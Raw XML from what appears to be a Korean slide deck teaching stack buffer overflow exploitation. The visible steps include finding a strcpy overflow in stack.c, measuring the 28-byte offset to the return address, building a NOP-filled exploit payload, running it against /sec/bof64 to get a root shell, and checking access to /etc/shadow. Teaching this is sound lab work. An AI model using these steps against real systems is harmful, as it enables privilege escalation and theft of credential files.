          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3879104180"/>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13004609"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2335403">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제거된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아래의 경우</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>, 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권한으로 실행되므로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098530"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50177" name="_x564840440">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA46C84B-BAC3-469D-AFCB-A99AF393A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91" y="4314277"/>
            <a:ext cx="4691063" cy="1820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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EA22538-687D-4085-8FE9-18C4C1EB9988}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="1" t="9990" r="-122"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310085" y="904875"/>
            <a:ext cx="4843690" cy="491774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="표 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47B8B31A-EFFF-45B0-9BAA-885DBA00D0F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4085510080"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6308677" y="1523070"/>
          <a:ext cx="4589304" cy="4840394"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4589304">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2128152829"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="229105">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>참고</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>]</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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94365321"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4122233">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="9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900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>이 활성화되면 스택에 있는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="9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변수의 주소가 실행시마다 변경됨을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코드 영역의 주소는 바뀌지 않음을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900" kern="0" spc="0" dirty="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6801801"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50179" name="_x564904520">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018268F2-EA4E-4654-AC73-9D03699D047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90" b="886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6376307" y="2253456"/>
            <a:ext cx="2763947" cy="388168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BAD6DB3-D844-4C5A-95C9-894E39AA1B0D}"/>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2A21F91F-1DC3-4908-B966-1CB4DD16BC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C1EF4009-4F0A-4E24-B8DD-1AF25D60AA3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8" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CB51EAB-7C62-4CB0-98D3-6CB1BA97D09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678716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확인을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 변경</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> test </a:t>
            </a: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 이용 공격 수행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64 $(python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/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용 출력이 되지 않음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B975456-1230-4EEF-9616-8DA77ABFA245}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="480786" y="1296225"/>
            <a:ext cx="4907534" cy="1807337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C61DB69B-C4ED-4FDF-8DE0-E8E414C60830}"/>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6" name="그룹 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A08284D-650F-4B1A-A1F3-5EDBF3FD238F}"/>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8226DAED-DF29-4C7C-9638-4E9BB63E06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EDEA2D6-0F3A-4B8B-AD25-4708E3D64A9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C5547EF7-E9FE-4EA6-BF78-076A8734565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8215787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코드가 포함된 페이로드를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>만드는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>exploit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루트 쉘을 획득하라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95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16" name="그룹 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{122AB61B-0024-401E-B838-EF52D8D8BB42}"/>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50915F6-E77C-4AF8-B5FA-3419167E89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B0AD85-FEC3-4365-A757-F8F8537D18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4779363B-6B6A-444B-9500-99AD02B021B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6741410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/stack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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stack.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 파일 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stack.c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err="1"/>
              <a:t>bof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수 사용으로 인한 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점이 존재함을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ojdump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stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>| more</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버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>시작으로부터</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 복귀 주소 시작까지의 거리는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA8D715-5190-4363-ADE3-5ED45E7A1552}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="725" t="9793" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="547007" y="1325678"/>
            <a:ext cx="4953262" cy="394784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51745194-F882-49F5-84C8-35FB497B0ED1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="547007" y="2386554"/>
            <a:ext cx="5012436" cy="2804795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62AC64D9-E07F-4522-A4F9-5985CFEB7915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="1" r="-30" b="50027"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285593" y="475692"/>
            <a:ext cx="4948464" cy="1442916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A388A016-BAFF-492D-AA4E-0F78C665F132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4013069219"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6319647" y="2189525"/>
          <a:ext cx="4532687" cy="4202566"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4532687">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3992703851"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23356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05935082"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3959219">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bof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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>buffer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(24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복귀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348403"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47105" name="_x564888896">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB31F6E-30A6-4412-BD4E-A74C36C72C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948" y="2778157"/>
            <a:ext cx="3559973" cy="313045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0829A799-8B06-46A4-82F5-321CBE3BBB88}"/>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7A76B71-EAB6-407A-AF8A-E844ADFC790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856923-BDBB-4924-909E-1BED1969E7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20157A6D-010D-4CF6-97F5-EAA085FA6A6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386885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 exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.c</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err="1"/>
              <a:t>.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>빌드</a:t>
            </a:r>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exploit exploit</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a:t>/sec/exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 이용한 페이로드 제작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ ./exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>28</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68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E56183-D24B-467D-8876-01211AFE7DD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="478" b="1886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="520699" y="866624"/>
            <a:ext cx="4901983" cy="2702076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25CF1106-5283-424F-AF5B-97A01DDAC91D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="957" t="4646" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="550327" y="4311650"/>
            <a:ext cx="4925568" cy="511889"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A24B75ED-6B35-4C94-AB13-3FC6A450DCE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1068" t="-277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="550327" y="5334930"/>
            <a:ext cx="4929506" cy="706161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{418F384F-0013-4CBA-BB0F-60762091DAD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172084023"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6265233" y="493694"/>
          <a:ext cx="5475010" cy="4580825"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2486881">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3675159690"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2988129">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="574915489"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="212013">
                <a:tc gridSpan="2">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tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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43398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먼저 페이로드를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NOP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채운다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kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>memset (&amp; buffer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>, 0x90, 517); // </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>nop</a:t>
                      </a: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a:effectLst/>
                        </a:rPr>
                        <a:t>buffer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
